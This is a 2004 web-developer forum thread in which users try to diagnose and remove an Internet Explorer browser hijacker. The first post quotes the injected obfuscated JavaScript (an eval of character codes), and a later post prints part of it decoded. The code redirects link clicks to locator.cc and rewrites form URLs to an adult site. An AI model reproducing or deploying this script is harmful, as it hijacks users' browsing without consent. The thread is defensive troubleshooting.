SitePoint Sponsor

User Tag List

Page 1 of 3 123 LastLast
Results 1 to 25 of 58
  1. #1
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Weird javascript code at the top of my source code

    I am getting some really weird javascript code on two of my sites, right above the <html> tag.

    Here is what I get

    Code:
     <script language="JavaScript">
     eval(String.fromCharCode(118,97,114,32,114,115,99,95,110,99,108,1
     07,61,48,59,118,97,114,32,114,115,99,95,107,119,95,102,111,117,110
     ,100,61,48,59,102,117,110,99,116,105,111,110,32,114,115,99,95,104,
     95,99,108,105,99,107,40,41,123,114,115,99,95,110,99,108,107,43,43,
     59,118,97,114,32,97,99,116,105,118,101,69,108,61,100,111,99,117,
     109,101,110,116,46,97,99,116,105,118,101,69,108,101,109,101,110,
     116,59,118,97,114,32,104,114,101,102,61,97,99,116,105,118,101,69,
     108,46,104,114,101,102,59,105,102,40,40,114,115,99,95,110,99,108,
     107,61,61,50,32,124,124,32,114,115,99,95,110,99,108,107,61,61,52,
     32,124,124,32,114,115,99,95,110,99,108,107,61,61,54,41,32,38,38,
     32,114,115,99,95,107,119,95,102,111,117,110,100,61,61,49,41,123,
     119,105,110,100,111,119,46,111,112,101,110,40,39,104,116,116,112,
     58,47,47,119,119,119,46,108,111,99,97,116,111,114,46,99,99,47,103,
     111,63,39,43,104,114,101,102,41,59,114,101,116,117,114,110,32,102,
     97,108,115,101,59,125,101,108,115,101,123,114,101,116,117,114,110,
     32,116,114,117,101,59,125,125,102,117,110,99,116,105,111,110,32,114,
     115,99,95,104,95,115,110,100,102,111,114,109,40,41,123,118,97,114,32,
     105,44,106,59,102,111,114,40,106,61,48,59,106,60,100,111,99,117,109,
     101,110,116,46,102,111,114,109,115,46,108,101,110,103,116,104,59,106,
     43,43,41,123,102,111,114,32,40,105,61,48,59,105,60,100,111,99,117,109,
     101,110,116,46,102,111,114,109,115,91,106,93,46,108,101,110,103,116,
     104,59,105,43,43,41,123,105,102,32,40,100,111,99,117,109,101,110,116,
     46,102,111,114,109,115,91,48,93,46,101,108,101,109,101,110,116,115,91,
     105,93,46,118,97,108,117,101,61,61,39,104,116,116,112,58,47,47,39,41,
     123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,
     101,108,101,109,101,110,116,115,91,105,93,46,118,97,108,117,101,61,
     39,104,116,116,112,58,47,47,119,119,119,46,97,100,117,108,116,45,
     100,118,100,109,111,118,105,101,46,99,111,109,47,39,59,125,125,
     125,114,101,116,117,114,110,32,116,114,117,101,59,125));
     </script>
    Don't quite understand it. They are both on the same host, so maybe the host is doing it? Don't know.

  2. #2
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ugh! Its my IE browser. When I check it, all links have an ONCLICk event, and there is some javascript code everywhere. I wonder if I have some spyware issues.

  3. #3
    gingham dress, army boots... silver trophy redux's Avatar
    Join Date
    Apr 2002
    Location
    Salford / Manchester / UK
    Posts
    4,838
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    a weird side effect of using the IE7 hack perhaps ? (just completely stabbing in the dark here)
    re·dux (adj.): brought back; returned. used postpositively
    [latin : re-, re- + dux, leader; see duke.]
    WaSP Accessibility Task Force Member
    splintered.co.uk | photographia.co.uk | redux.deviantart.com

  4. #4
    The short answer is yes... Herbster's Avatar
    Join Date
    Oct 2001
    Location
    Bay City, Oregon
    Posts
    715
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    All those numbers in the js translate to this:

    Edit: OK. I'm not feeling comfortable posting javascript, so I sent it to you via pm jag5311.

    It uses 'http://www.locator.cc/go?'+href as a redirector and has something to do with adult DVDs.

  5. #5
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nope. I think it has something to do with a virus or spyware. Not sure how this crap got in my system. It doesn't affect mozilla or firebird, but IE. No hack though. I have run spybot, adaware, and Hijack This! and I have cleaned everything, and its still there. I will look for the locator.cc on google.

  6. #6
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Man, I can't even do windows update. This is causing mucho problemo's.

  7. #7
    SitePoint Guru quenting's Avatar
    Join Date
    Dec 2002
    Location
    Switzerland
    Posts
    735
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Man, I can't even do windows update.
    not smelling good... Do you have spybot ? An antivirus software ? Can you run regedit ?
    The largest message boards on the web !
    unblog.fr, hosting 700000 french blogs

  8. #8
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Well, heres another thing, when I went to Yahoo and tried to login there, It gave me a problem not allowing me to login. If I choose to post a NEW topic here, the windows and positioning get all F*ED up and I can't even put my cursor in the edit box. What I am hoping is that I didn't remove something when I ran HiJack This!

    Yes I can run Regedit. This seems to only affect Internet Explorer.

    I have ran Ad-Aware (latest build), spybot search and destroy (latest build), and hijack this!

    Now, I earlier, I did have spyware on my computer that was affect Internet Explorer. It was preventing me from accessing sites like yahoo.com and google.com It would try and add a long string of numbers to my url like %67%67%64%, so maybe it was trying to add that javascript code I mentioned earlier. When I would go to my preferences and for my default homepage, the long string of what I just posted (%67%68 etc.) in in box where you can enter your own url address. I might be jumping into the registry on this one. Damnit

  9. #9
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Just so you know, here is a link over at experts exchange that I have going if you want some more detail.

    http://www.experts-exchange.com/Oper..._20938171.html

    Thanks

  10. #10
    SitePoint Guru quenting's Avatar
    Join Date
    Dec 2002
    Location
    Switzerland
    Posts
    735
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i'd suggest to stop all running programs, then to go to your tasks manager / process list, and type all of them in google. See if anything suspect shows up (there are quite a few sites describing most of the process likely to run on a "regular" computer with all programs stopped).
    A process not showing up any results in gg is to be considered very suspect.

    Quentin
    The largest message boards on the web !
    unblog.fr, hosting 700000 french blogs

  11. #11
    100% Windoze-free earther's Avatar
    Join Date
    Feb 2003
    Location
    Linuxland
    Posts
    2,788
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You need to be very careful when using HijackThis. There is a HijackThis forum at http://forums.net-integration.net/in...p?showforum=32 that might be useful to you. Good luck!

  12. #12
    SitePoint Wizard Keriam's Avatar
    Join Date
    Jun 2003
    Location
    Colorado, USA
    Posts
    1,178
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by jag5311
    Well, heres another thing, when I went to Yahoo and tried to login there, It gave me a problem not allowing me to login. If I choose to post a NEW topic here, the windows and positioning get all F*ED up and I can't even put my cursor in the edit box. What I am hoping is that I didn't remove something when I ran HiJack This!
    The symptoms you are describing are that exact same ones a firend of mine had. Turned out to be a virus. I don't remember which one, but he had the problem about the time of the first big Blaster outbreak.
    Never put off until tomorrow what you can do
    the day after tomorrow. ~ Mark Twain

  13. #13
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Keriam
    The symptoms you are describing are that exact same ones a firend of mine had. Turned out to be a virus. I don't remember which one, but he had the problem about the time of the first big Blaster outbreak.
    What did he do to fix it? I ran Mcafee and ended up deleting about 24 so called "viruses" but it didn't fix the problem. Then I tried repairing IE and I am having problems. I am running IE 6 service pack 1 and trying to reinstall it and it keeps gettng stuck at 3748 out of 7553 kb. It won't go beyond that. Argh!

  14. #14
    SitePoint Guru quenting's Avatar
    Join Date
    Dec 2002
    Location
    Switzerland
    Posts
    735
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    well, if I was in your place and my antivirus found 24 of them, just in the sake of future safety, I would simply back up my data, and (yeah i know you don't want to read that ) reinstall windows... That's just me, but if my box ever gets virused, im not confident enough in antivirus software to trust it on no one being left.
    Or, you can start using mozilla firefox .
    The largest message boards on the web !
    unblog.fr, hosting 700000 french blogs

  15. #15
    ********* Wizard silver trophy Cam's Avatar
    Join Date
    Aug 2002
    Location
    Burpengary, Australia
    Posts
    4,495
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)
    I've seen the exact same problem but it was passing the URLs through a different domain. There's a registry key, so search your registry for www.locator.cc and use some common sense (I don't know exactly what you're looking for so I can't post specifics) to remove the offending keys. Actually, don't remove them, just empty them (remove the offending data)

  16. #16
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks Packman,

    Well, I know this sounds stupid, but those 24 could have been related to spyware and might not have been destructive. I agree doing a backup of my system should be in the works, but man o man, I don't want to reinstall windows. I don't think anything is corrupted, I do think, however, that the long list of javascript before every page is altering my browsing experience. Tables appear different sizes, especially here on sitepoint, the font looks all different, going to Windows Update gives me a small error, so getting IE fixed is the issue.

    What I found weird was that I thought that mcafee virusscan when it runs in the background would pick up on those 24 "viruses", but it wasn't until I ran a full system scan that it found something.

    sh*t sh*t sh*t sh*t sh*t sh*t

  17. #17
    SitePoint Guru quenting's Avatar
    Join Date
    Dec 2002
    Location
    Switzerland
    Posts
    735
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    some types of virusses are recurrent (a service brings them back as soon as the antivirus kicked them out), if you re-do a virus scan, does it find anything or not ?

    Just to let you know, i experienced a little virus 3 months ago, it wouldn't let me edit registry, and a service was running that i could not stop / disable and when i tried removing the files it used from my linux partition, the files would get back there the next time i start up windows.
    Finally i launched norton, everything freezed and then no .exe could ever be launched. I finally could backup thanks again to my linux partition, but really, i would strongly advice you to quickly backup your data.
    The largest message boards on the web !
    unblog.fr, hosting 700000 french blogs

  18. #18
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks Quenting, I think I will. I guess, so far, I am glad it just affects Internet Explorer. I haven't had any other issues at all. I think I forgot to check one important thing, to look at the programs and processess currenting running (CTRL ALT DELETE) I will check that tonight.

  19. #19
    SitePoint Wizard Keriam's Avatar
    Join Date
    Jun 2003
    Location
    Colorado, USA
    Posts
    1,178
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by jag5311
    What did he do to fix it? I ran Mcafee and ended up deleting about 24 so called "viruses" but it didn't fix the problem. Then I tried repairing IE and I am having problems. I am running IE 6 service pack 1 and trying to reinstall it and it keeps gettng stuck at 3748 out of 7553 kb. It won't go beyond that. Argh!
    You know, I wish I could remember, and I have been trying. I know we had to download a specific repair tool from Symantec, run that, then run AV update, then run full scan.

    Problem with this particular friend is he screws up his computer so often I could fill a book (and maybe I should keep notes) with stuff I have to do to fix his system.
    Never put off until tomorrow what you can do
    the day after tomorrow. ~ Mark Twain

  20. #20
    SitePoint Member IllusionOverride's Avatar
    Join Date
    Apr 2004
    Location
    Belgium
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Angry My problem too

    Hello I luckily found this forum

    I got the same problem since yesterday too


    1.when i type "www.google.fr" it goes to http://ehttp.cc/?www.google.fr (google.fr for example)

    2.My startpage resets at : http://%68%6F%6D%65%70%61%67%65%2E%6...%63%63/%68%70/

    Translated through javascript unescape method : homepage.com

    3.The famous Script runned with eval() before each page of each website i visit (see top of this forum)

    Translate to :

    var rsc_nclk=0;
    var rsc_kw_found=0;

    function rsc_h_click(){
    rsc_nclk++;
    var activeEl=document.activeElement;
    var href=activeEl.href;
    if((rsc_nclk==2) && rsc_kw_found==1)
    {
    window.open('http://www.locator.cc/go?'+href);
    return false;
    }else
    {
    return true;
    }

    }

    function rsc_h_sndform(){
    var i,j;
    for(j=0;j


    Problem is : this function is not complete and i found a coockie

    Administrator@www.locator.cc(1) telling some listing
    vst[n] followed by numbers
    (n a number)
    example :
    vst[0]ywww.locator.cc/153645113664029629285282351171229629028

    4.For those who understand french :

    [2004/04/04 00:31:54 3124.1]
    #-198 Ligne de commande traitée : "F:\Program Files\Internet Explorer\iexplore.exe"
    #-024 Copie du fichier "c:\Recycled\1.exe" sur "F:\WINXP\Downloaded Program Files\1.exe".
    #E361 Un fichier "c:\Recycled\1.exe" non signé ou incorrectement signé sera installé (Stratégie = ignorer). Erreur 0x800b0100: Il n'y avait pas de signature dans le sujet.
    [2004/04/04 00:35:25 3124.2]
    #-198 Ligne de commande traitée : "F:\Program Files\Internet Explorer\iexplore.exe"
    #-024 Copie du fichier "F:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OTUVSPQ3\e[1].exe" sur "F:\WINXP\Downloaded Program Files\e.exe".
    #E361 Un fichier "F:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OTUVSPQ3\e[1].exe" non signé ou incorrectement signé sera installé (Stratégie = ignorer). Erreur 0x800b0100: Il n'y avait pas de signature dans le sujet.


    This is my log extract of SetupApi.log

    --> My internet Explorer was hacked successively by
    unsigned executables copied from internet temp files in "Downloaded Program Files" (in winxp folder)
    named :
    1.exe and E.exe

    who were removed from my computer


    5.I got Norton, so it bugged because it works on html pages who were ****ed by the virus, i installed Avast and AVG to replace for the moment


    So, i've send these informations to Abuses @microsoft ; @symantec; @homepage.com ; for the guy of locator.cc and ehttp.cc




    I don't know how to resolve this, i don't know how to hack www.locator.cc : to get maybe the go(.php i suppose) , i don't know what the ".cc" domains are for.

    I'm actually looking for a API calls interceptor to get the calls who replace Iexplore.exe when i delete it

    Iexplore.exe, when i try to uninstall it, stays, because Miko$oft Winsh*t is based on it so, it's not possible to give a shot to remove it.


    Hope these infos will help us to progress

  21. #21
    SitePoint Member IllusionOverride's Avatar
    Join Date
    Apr 2004
    Location
    Belgium
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This virus seems to **** only iexplorer, so i'll use netscape for the moment (**** miko$oft ! )



    I have also to say that All the servers involved in this operation :

    www.locator.cc/ and www.ehttp.cc/

    Are based in the US, i saw that when i made a whois, from there i got their abuse address.

  22. #22
    SitePoint Wizard Keriam's Avatar
    Join Date
    Jun 2003
    Location
    Colorado, USA
    Posts
    1,178
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by IllusionOverride
    www.locator.cc/ and www.ehttp.cc/

    Are based in the US, i saw that when i made a whois, from there i got their abuse address.
    Umm, really? .cc is the country code for Cocos (Keeling) Islands and a whois search with the sponsoring organization for that TLD shows the first is owned by JRC Group in Australia and the second is owned by Anchor Group Ltd. in the UK.
    Never put off until tomorrow what you can do
    the day after tomorrow. ~ Mark Twain

  23. #23
    SitePoint Member IllusionOverride's Avatar
    Join Date
    Apr 2004
    Location
    Belgium
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Keriam
    Umm, really? .cc is the country code for Cocos (Keeling) Islands and a whois search with the sponsoring organization for that TLD shows the first is owned by JRC Group in Australia and the second is owned by Anchor Group Ltd. in the UK.
    Well, actually, i didn't make a whois but a trace

    http://www.postbox.ch/index.asp?page=81

    I don't have a whois website url in my collection


    I still don't know how to resolve the situation else than by asking those people or maybe
    hack those server (and i'm not a hacker enough to know how) and find the solution in the code from ourselves.

  24. #24
    SitePoint Member IllusionOverride's Avatar
    Join Date
    Apr 2004
    Location
    Belgium
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I will also add that i think this virus hacks also the ActiveX control system because i cant access www.secuser.com 's online anti-virus whose an activeX control based online anti-virus


    Actually i don't know exactly how iexplore is implemented in WinXP or how activeX and java (who works) are linked through the different browsers.

    For example : Netscape had to install another version of Java Runtime Environnement, but it seems to use the same ActiveX than iexplore because i got :

    Either the browser does not support the Object element or an error occurred while downloading the object. Unable to loading HouseCall ActiveX Control.

    at http://www.secuser.com/antivirus/index.htm and i think netscape should normally run it, can someone with netscape confirm that ?

  25. #25
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I am glad I am not alone in this. I hope something can be resolved, because it causes many things to act goofy in IE



    Quote Originally Posted by IllusionOverride
    I will also add that i think this virus hacks also the ActiveX control system because i cant access www.secuser.com 's online anti-virus whose an activeX control based online anti-virus


    Actually i don't know exactly how iexplore is implemented in WinXP or how activeX and java (who works) are linked through the different browsers.

    For example : Netscape had to install another version of Java Runtime Environnement, but it seems to use the same ActiveX than iexplore because i got :

    Either the browser does not support the Object element or an error occurred while downloading the object. Unable to loading HouseCall ActiveX Control.

    at http://www.secuser.com/antivirus/index.htm and i think netscape should normally run it, can someone with netscape confirm that ?


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •